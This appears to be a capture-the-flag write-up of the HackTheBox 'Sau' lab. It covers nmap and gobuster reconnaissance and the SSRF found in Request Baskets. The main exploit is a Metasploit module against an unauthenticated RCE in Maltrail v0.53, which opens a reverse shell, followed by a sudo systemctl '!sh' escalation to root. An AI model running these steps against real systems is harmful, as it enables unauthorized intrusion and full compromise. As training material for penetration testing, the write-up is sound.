Inside the Box: Sau HackTheBox Uncovered

Embark on an exhilarating journey as we delve into the electrifying world of hacking, dissecting the “Sau” HackTheBox lab. With nerves of steel and a cunning eye for detail, we uncover hidden secrets within this mysterious domain. Armed with Nmap scans, we hunt for vulnerabilities, paving the path to exhilarating SSRF exploits and spine-tingling RCE attacks. Join me as I infiltrate, escalate, and ultimately conquer the challenge, unraveling the thrilling saga of penetration testing.

Information Gathering:

Initial Scanning:

sudo nmap -sV -sS -A <IP>

Nmap Scan

Nmap scan to identify open ports and services running on the target machine. The scan revealed the following information:

• Port 22 (SSH) is open, running OpenSSH 8.2p1 on an Ubuntu-based system.
• Port 80 (HTTP) is filtered and not responding.
• Port 55555 is open, but the service is unknown.

Directory Enumeration:

Gobuster to perform directory enumeration on the target’s web server, specifying common file extensions like .php and .txt

gobuster dir -u http://<IP>/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 50

Directory Enumeration

The results showed two directories:

• /demo
• /web

When I visited the /web directory, I found "Request Baskets" web service running with version 1.2.1

In the /demo directory, server is running Maltrail v0.53, a malicious traffic detection system.

Vulnerability Analysis:

I searched for known exploits related to “Request Baskets” and found a hit: “SSRF on Request-Baskets (CVE-2023–27163).”

Additionally, discovered an exploit for Maltrail: “Unauthenticated Remote Code Execution (RCE).”

Search Exploit: Searchsploit search

Initial Foothold:

I decided to exploit the Maltrail service using Metasploit. Here are the steps:

• Launched msfconsole to open Metasploit.
• Searched for the Maltrail exploit module using the command search maltrail.
• Selected the appropriate exploit module (e.g., use 0).
• Checked the available options using show options.

Metasploit Console

• Set the target IP using set RHOST <IP>.
• Set the target port to 55555 using set RPORT 55555.
• Specified the target URI as /demo with set TARGETURI /demo.
• Set your listener IP (LHOST) and port (LPORT) for the reverse shell.

Set Options for the exploit

• Finally, executed the exploit using run.

Start Listener

As a result, successfully obtained a Meterpreter session, gaining initial access to the target machine.

Meterpreter Session

User Flag

Privilege Escalation:

I executed sudo -l to check if there was any command that could be performed as sudo without a password.

Sudo -l output

I discovered that we could use sudo on systemctl, so I visited GTFObins and obtained the privilege escalation exploit to break out of the environment and gain root access.

# Execute 
sudo /usr/bin/systemctl status trail.service

# Break environment
!sh

This action granted me root privileges, effectively taking control of the system.

PrivEsc to root

Finally, you retrieved the user and root flags:

• The user flag is located at /home/puma/user.txt
• The root flag is located at /root/root.txt

Successfully compromised the Sau HackTheBox lab, obtained user and root privileges, and retrieved both user and root flags.